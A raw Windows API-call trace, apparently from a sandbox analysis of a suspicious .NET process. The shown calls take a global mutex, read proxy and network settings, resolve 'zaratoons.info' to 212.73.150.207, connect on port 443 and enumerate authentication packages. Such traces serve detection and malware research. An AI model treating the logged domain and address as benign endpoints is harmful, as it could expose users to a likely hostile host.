	[0727.282] GetVersionExW (in: lpVersionInformation=0x1c85c5d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c85c5d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0727.283] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2dad7d0, cbSid=0x1c85d610 | out: pSid=0x2dad7d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d610) returned 1
	[0729.094] CreateMutexW (lpMutexAttributes=0x2dad9d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0729.095] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0729.113] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x102
	[0733.114] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0733.116] GetCurrentProcessId () returned 0xf38
	[0733.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x3e0
	[0733.117] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x1c85d520, lpExitTime=0x1c85d518, lpKernelTime=0x1c85d510, lpUserTime=0x1c85d508 | out: lpCreationTime=0x1c85d520, lpExitTime=0x1c85d518, lpKernelTime=0x1c85d510, lpUserTime=0x1c85d508) returned 1
	[0733.118] CloseHandle (hObject=0x3e0) returned 1
	[0733.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3e0
	[0733.118] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x1c85d5b0, lpExitTime=0x1c85d5a8, lpKernelTime=0x1c85d5a0, lpUserTime=0x1c85d598 | out: lpCreationTime=0x1c85d5b0, lpExitTime=0x1c85d5a8, lpKernelTime=0x1c85d5a0, lpUserTime=0x1c85d598) returned 1
	[0733.118] CloseHandle (hObject=0x3e0) returned 1
	[0733.118] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3e0
	[0733.120] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.120] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.120] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c85d508, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c85d508*=0x3e4) returned 1
	[0733.122] CloseHandle (hObject=0x3e4) returned 1
	[0733.122] CloseHandle (hObject=0x3e0) returned 1
	[0733.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x3e0
	[0733.122] GetProcessTimes (in: hProcess=0x3e0, lpCreationTime=0x1c85d5b0, lpExitTime=0x1c85d5a8, lpKernelTime=0x1c85d5a0, lpUserTime=0x1c85d598 | out: lpCreationTime=0x1c85d5b0, lpExitTime=0x1c85d5a8, lpKernelTime=0x1c85d5a0, lpUserTime=0x1c85d598) returned 1
	[0733.122] CloseHandle (hObject=0x3e0) returned 1
	[0733.122] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x3e0
	[0733.123] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.123] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.123] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c85d508, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c85d508*=0x3e4) returned 1
	[0733.123] CloseHandle (hObject=0x3e4) returned 1
	[0733.123] CloseHandle (hObject=0x3e0) returned 1
	[0733.125] ReleaseMutex (hMutex=0x3d4) returned 1
	[0733.125] CloseHandle (hObject=0x3d4) returned 1
	[0734.586] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2dae928, cbSid=0x1c85d610 | out: pSid=0x2dae928*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d610) returned 1
	[0734.587] CreateMutexW (lpMutexAttributes=0x2daeae0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.587] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.588] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.588] CloseHandle (hObject=0x3d4) returned 1
	[0734.588] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2daf750, cbSid=0x1c85d610 | out: pSid=0x2daf750*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d610) returned 1
	[0734.588] CreateMutexW (lpMutexAttributes=0x2daf908, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.588] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.589] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.589] CloseHandle (hObject=0x3d4) returned 1
	[0734.589] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2db0588, cbSid=0x1c85d610 | out: pSid=0x2db0588*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d610) returned 1
	[0734.590] CreateMutexW (lpMutexAttributes=0x2db0740, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.590] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.590] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.591] CloseHandle (hObject=0x3d4) returned 1
	[0734.591] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2db13b8, cbSid=0x1c85d610 | out: pSid=0x2db13b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d610) returned 1
	[0734.591] CreateMutexW (lpMutexAttributes=0x2db1570, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.591] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.592] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.592] CloseHandle (hObject=0x3d4) returned 1
	[0734.594] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2db21e8, cbSid=0x1c85d5c0 | out: pSid=0x2db21e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d5c0) returned 1
	[0734.595] CreateMutexW (lpMutexAttributes=0x2db23a0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.595] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.595] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.596] CloseHandle (hObject=0x3d4) returned 1
	[0734.596] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2db3008, cbSid=0x1c85d5c0 | out: pSid=0x2db3008*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d5c0) returned 1
	[0734.596] CreateMutexW (lpMutexAttributes=0x2db31c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.596] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.597] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.597] CloseHandle (hObject=0x3d4) returned 1
	[0734.597] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2db3e20, cbSid=0x1c85d5c0 | out: pSid=0x2db3e20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d5c0) returned 1
	[0734.597] CreateMutexW (lpMutexAttributes=0x2db3fd8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.597] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.598] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.598] CloseHandle (hObject=0x3d4) returned 1
	[0734.598] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2db4c48, cbSid=0x1c85d5c0 | out: pSid=0x2db4c48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d5c0) returned 1
	[0734.599] CreateMutexW (lpMutexAttributes=0x2db4e00, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.599] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.599] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.600] CloseHandle (hObject=0x3d4) returned 1
	[0734.600] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2db5a68, cbSid=0x1c85d5c0 | out: pSid=0x2db5a68*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c85d5c0) returned 1
	[0734.600] CreateMutexW (lpMutexAttributes=0x2db5c20, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0734.600] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0x1f4) returned 0x0
	[0734.601] ReleaseMutex (hMutex=0x3d4) returned 1
	[0734.601] CloseHandle (hObject=0x3d4) returned 1
	[0737.624] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d4
	[0737.625] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e0
	[0737.626] ioctlsocket (in: s=0x3d4, cmd=-2147195266, argp=0x1c85dbf8 | out: argp=0x1c85dbf8) returned 0
	[0737.626] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e4
	[0737.626] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8
	[0737.626] ioctlsocket (in: s=0x3e4, cmd=-2147195266, argp=0x1c85dbf8 | out: argp=0x1c85dbf8) returned 0
	[0737.627] WSAIoctl (in: s=0x3d4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c85db70, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c85db70, lpOverlapped=0x0) returned -1
	[0737.628] CoTaskMemAlloc (cb=0x204) returned 0x3ba1e0
	[0737.628] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ba1e0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.064] CoTaskMemFree (pv=0x3ba1e0) 
	[0739.065] WSAEventSelect (s=0x3d4, hEventObject=0x3e0, lNetworkEvents=512) returned 0
	[0739.065] WSAIoctl (in: s=0x3e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c85db70, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c85db70, lpOverlapped=0x0) returned -1
	[0739.065] CoTaskMemAlloc (cb=0x204) returned 0x3ba1e0
	[0739.065] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ba1e0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.065] CoTaskMemFree (pv=0x3ba1e0) 
	[0739.065] WSAEventSelect (s=0x3e4, hEventObject=0x3e8, lNetworkEvents=512) returned 0
	[0739.065] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ec
	[0739.066] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x3ec, param_3=0x3) returned 0x0
	[0739.072] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c85dcb0 | out: phkResult=0x1c85dcb0*=0x408) returned 0x0
	[0739.074] RegOpenKeyExW (in: hKey=0x408, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c85db98 | out: phkResult=0x1c85db98*=0x40c) returned 0x0
	[0739.074] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x410
	[0739.075] RegNotifyChangeKeyValue (hKey=0x40c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x410, fAsynchronous=1) returned 0x0
	[0739.076] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c85dbc0 | out: phkResult=0x1c85dbc0*=0x414) returned 0x0
	[0739.076] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x418
	[0739.076] RegNotifyChangeKeyValue (hKey=0x414, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x418, fAsynchronous=1) returned 0x0
	[0739.076] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c85dbc0 | out: phkResult=0x1c85dbc0*=0x41c) returned 0x0
	[0739.077] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420
	[0739.077] RegNotifyChangeKeyValue (hKey=0x41c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x420, fAsynchronous=1) returned 0x0
	[0739.077] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.077] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85db28 | out: TokenHandle=0x1c85db28*=0x424) returned 1
	[0739.085] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.085] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d2f8 | out: TokenHandle=0x1c85d2f8*=0x428) returned 1
	[0739.090] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.090] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d2f8 | out: TokenHandle=0x1c85d2f8*=0x42c) returned 1
	[0746.277] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c85dbf8 | out: pProxyConfig=0x1c85dbf8) returned 1
	[0748.352] SetEvent (hEvent=0x36c) returned 1
	[0754.931] GetCurrentProcess () returned 0xffffffffffffffff
	[0754.931] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d368 | out: TokenHandle=0x1c85d368*=0x48c) returned 1
	[0755.014] GetCurrentProcess () returned 0xffffffffffffffff
	[0755.014] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d368 | out: TokenHandle=0x1c85d368*=0x490) returned 1
	[0756.492] SetEvent (hEvent=0x36c) returned 1
	[0763.903] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c85d838 | out: pFixedInfo=0x0, pOutBufLen=0x1c85d838) returned 0x6f
	[0773.442] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b3e3dd0
	[0773.442] GetNetworkParams (in: pFixedInfo=0x1b3e3dd0, pOutBufLen=0x1c85d838 | out: pFixedInfo=0x1b3e3dd0, pOutBufLen=0x1c85d838) returned 0x0
	[0779.598] CoTaskMemAlloc (cb=0xd) returned 0x1b391a40
	[0779.598] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0779.598] CoTaskMemFree (pv=0x1b391a40) 
	[0779.601] LocalFree (hMem=0x1b3e3dd0) returned 0x0
	[0779.615] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a0
	[0779.616] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d8
	[0779.618] CoTaskMemAlloc (cb=0x10) returned 0x1b391a40
	[0779.619] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c85d7e0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c85d7d8 | out: ppResult=0x1c85d7d8*=0x1b3d7930*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b391fc0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0784.218] CoTaskMemFree (pv=0x1b391a40) 
	[0784.218] CoTaskMemFree (pv=0x0) 
	[0784.219] FreeAddrInfoW (pAddrInfo=0x1b3d7930*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b391fc0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0784.221] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b0
	[0784.221] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3cc
	[0784.221] ioctlsocket (in: s=0x4b0, cmd=-2147195266, argp=0x1c85d7f8 | out: argp=0x1c85d7f8) returned 0
	[0784.221] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x42c
	[0784.221] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0
	[0784.221] ioctlsocket (in: s=0x42c, cmd=-2147195266, argp=0x1c85d7f8 | out: argp=0x1c85d7f8) returned 0
	[0784.221] WSAIoctl (in: s=0x4b0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c85d770, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c85d770, lpOverlapped=0x0) returned -1
	[0784.222] CoTaskMemAlloc (cb=0x204) returned 0x3ba810
	[0784.222] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ba810, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.224] CoTaskMemFree (pv=0x3ba810) 
	[0784.224] WSAEventSelect (s=0x4b0, hEventObject=0x3cc, lNetworkEvents=512) returned 0
	[0784.225] WSAIoctl (in: s=0x42c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c85d770, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c85d770, lpOverlapped=0x0) returned -1
	[0784.225] CoTaskMemAlloc (cb=0x204) returned 0x3ba810
	[0784.225] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ba810, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.225] CoTaskMemFree (pv=0x3ba810) 
	[0784.225] WSAEventSelect (s=0x42c, hEventObject=0x3d0, lNetworkEvents=512) returned 0
	[0784.977] GetAdaptersAddresses () returned 0x6f
	[0785.061] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b3ee0c0
	[0785.061] GetAdaptersAddresses () returned 0x0
	[0787.136] LocalFree (hMem=0x1b3ee0c0) returned 0x0
	[0787.139] WSAConnect (in: s=0x4a0, name=0x2dc15a8*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0787.261] closesocket (s=0x3d8) returned 0
	[0788.300] EnumerateSecurityPackagesW (in: pcPackages=0x1c85d658, ppPackageInfo=0x1c85d650 | out: pcPackages=0x1c85d658, ppPackageInfo=0x1c85d650) returned 0x0
	[0788.304] lstrlenW (lpString="Negotiate") returned 9
	[0789.308] CoTaskMemAlloc (cb=0x16) returned 0x1b391f80
	[0789.308] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0b90, Length=0x14 | out: Destination=0x1b391f80) 
	[0789.308] CoTaskMemFree (pv=0x1b391f80) 
	[0789.308] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0789.308] CoTaskMemAlloc (cb=0x3c) returned 0x1b3d8b40
	[0789.308] RtlMoveMemory (in: Destination=0x1b3d8b40, Source=0x3a0ba4, Length=0x3a | out: Destination=0x1b3d8b40) 
	[0789.311] CoTaskMemFree (pv=0x1b3d8b40) 
	[0789.311] lstrlenW (lpString="NegoExtender") returned 12
	[0789.311] CoTaskMemAlloc (cb=0x1c) returned 0x1b3dc330
	[0789.311] RtlMoveMemory (in: Destination=0x1b3dc330, Source=0x3a0bde, Length=0x1a | out: Destination=0x1b3dc330) 
	[0789.311] CoTaskMemFree (pv=0x1b3dc330) 
	[0789.311] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0789.311] CoTaskMemAlloc (cb=0x3e) returned 0x1b3d8b40
	[0789.311] RtlMoveMemory (in: Destination=0x1b3d8b40, Source=0x3a0bf8, Length=0x3c | out: Destination=0x1b3d8b40) 
	[0789.311] CoTaskMemFree (pv=0x1b3d8b40) 
	[0789.311] lstrlenW (lpString="Kerberos") returned 8
	[0789.312] CoTaskMemAlloc (cb=0x14) returned 0x1b391f80
	[0789.312] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0c34, Length=0x12 | out: Destination=0x1b391f80) 
	[0789.312] CoTaskMemFree (pv=0x1b391f80) 
	[0789.312] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0789.312] CoTaskMemAlloc (cb=0x32) returned 0x1b3d7670
	[0789.312] RtlMoveMemory (in: Destination=0x1b3d7670, Source=0x3a0c46, Length=0x30 | out: Destination=0x1b3d7670) 
	[0789.312] CoTaskMemFree (pv=0x1b3d7670) 
	[0789.312] lstrlenW (lpString="NTLM") returned 4
	[0789.312] CoTaskMemAlloc (cb=0xc) returned 0x1b391f80
	[0789.312] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0c76, Length=0xa | out: Destination=0x1b391f80) 
	[0789.312] CoTaskMemFree (pv=0x1b391f80) 
	[0789.312] lstrlenW (lpString="NTLM Security Package") returned 21
	[0789.312] CoTaskMemAlloc (cb=0x2e) returned 0x1b3d7670
	[0789.312] RtlMoveMemory (in: Destination=0x1b3d7670, Source=0x3a0c80, Length=0x2c | out: Destination=0x1b3d7670) 
	[0789.312] CoTaskMemFree (pv=0x1b3d7670) 
	[0789.312] lstrlenW (lpString="Schannel") returned 8
	[0789.312] CoTaskMemAlloc (cb=0x14) returned 0x1b391f80
	[0789.312] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0cac, Length=0x12 | out: Destination=0x1b391f80) 
	[0789.312] CoTaskMemFree (pv=0x1b391f80) 
	[0789.312] lstrlenW (lpString="Schannel Security Package") returned 25
	[0789.313] CoTaskMemAlloc (cb=0x36) returned 0x1b3d7670
	[0789.313] RtlMoveMemory (in: Destination=0x1b3d7670, Source=0x3a0cbe, Length=0x34 | out: Destination=0x1b3d7670) 
	[0789.313] CoTaskMemFree (pv=0x1b3d7670) 
	[0789.313] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0789.313] CoTaskMemAlloc (cb=0x5c) returned 0x1b3c2280
	[0789.313] RtlMoveMemory (in: Destination=0x1b3c2280, Source=0x3a0cf2, Length=0x5a | out: Destination=0x1b3c2280) 
	[0789.313] CoTaskMemFree (pv=0x1b3c2280) 
	[0789.313] lstrlenW (lpString="Schannel Security Package") returned 25
	[0789.313] CoTaskMemAlloc (cb=0x36) returned 0x1b3d7670
	[0789.313] RtlMoveMemory (in: Destination=0x1b3d7670, Source=0x3a0d4c, Length=0x34 | out: Destination=0x1b3d7670) 
	[0789.313] CoTaskMemFree (pv=0x1b3d7670) 
	[0789.313] lstrlenW (lpString="WDigest") returned 7
	[0789.313] CoTaskMemAlloc (cb=0x12) returned 0x1b391f80
	[0789.313] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0d80, Length=0x10 | out: Destination=0x1b391f80) 
	[0789.313] CoTaskMemFree (pv=0x1b391f80) 
	[0789.313] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0789.313] CoTaskMemAlloc (cb=0x46) returned 0x1b3d8b40
	[0789.313] RtlMoveMemory (in: Destination=0x1b3d8b40, Source=0x3a0d90, Length=0x44 | out: Destination=0x1b3d8b40) 
	[0789.313] CoTaskMemFree (pv=0x1b3d8b40) 
	[0789.314] lstrlenW (lpString="TSSSP") returned 5
	[0789.314] CoTaskMemAlloc (cb=0xe) returned 0x1b391f80
	[0789.314] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0dd4, Length=0xc | out: Destination=0x1b391f80) 
	[0789.314] CoTaskMemFree (pv=0x1b391f80) 
	[0789.314] lstrlenW (lpString="TS Service Security Package") returned 27
	[0789.314] CoTaskMemAlloc (cb=0x3a) returned 0x1b3d8b40
	[0789.314] RtlMoveMemory (in: Destination=0x1b3d8b40, Source=0x3a0de0, Length=0x38 | out: Destination=0x1b3d8b40) 
	[0789.314] CoTaskMemFree (pv=0x1b3d8b40) 
	[0789.314] lstrlenW (lpString="pku2u") returned 5
	[0789.314] CoTaskMemAlloc (cb=0xe) returned 0x1b391f80
	[0789.314] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0e18, Length=0xc | out: Destination=0x1b391f80) 
	[0789.314] CoTaskMemFree (pv=0x1b391f80) 
	[0789.314] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0789.314] CoTaskMemAlloc (cb=0x30) returned 0x1b3d7670
	[0789.314] RtlMoveMemory (in: Destination=0x1b3d7670, Source=0x3a0e24, Length=0x2e | out: Destination=0x1b3d7670) 
	[0789.314] CoTaskMemFree (pv=0x1b3d7670) 
	[0789.314] lstrlenW (lpString="CREDSSP") returned 7
	[0789.314] CoTaskMemAlloc (cb=0x12) returned 0x1b391f80
	[0789.314] RtlMoveMemory (in: Destination=0x1b391f80, Source=0x3a0e52, Length=0x10 | out: Destination=0x1b391f80) 
	[0789.314] CoTaskMemFree (pv=0x1b391f80) 
	[0789.315] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0789.315] CoTaskMemAlloc (cb=0x4a) returned 0x1b3e60c0
	[0789.315] RtlMoveMemory (in: Destination=0x1b3e60c0, Source=0x3a0e62, Length=0x48 | out: Destination=0x1b3e60c0) 
	[0789.315] CoTaskMemFree (pv=0x1b3e60c0) 
	[0789.315] FreeContextBuffer (in: pvContextBuffer=0x3a0a50 | out: pvContextBuffer=0x3a0a50) returned 0x0
	[0789.323] GetCurrentProcess () returned 0xffffffffffffffff
	[0789.323] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d138 | out: TokenHandle=0x1c85d138*=0x3d8) returned 1
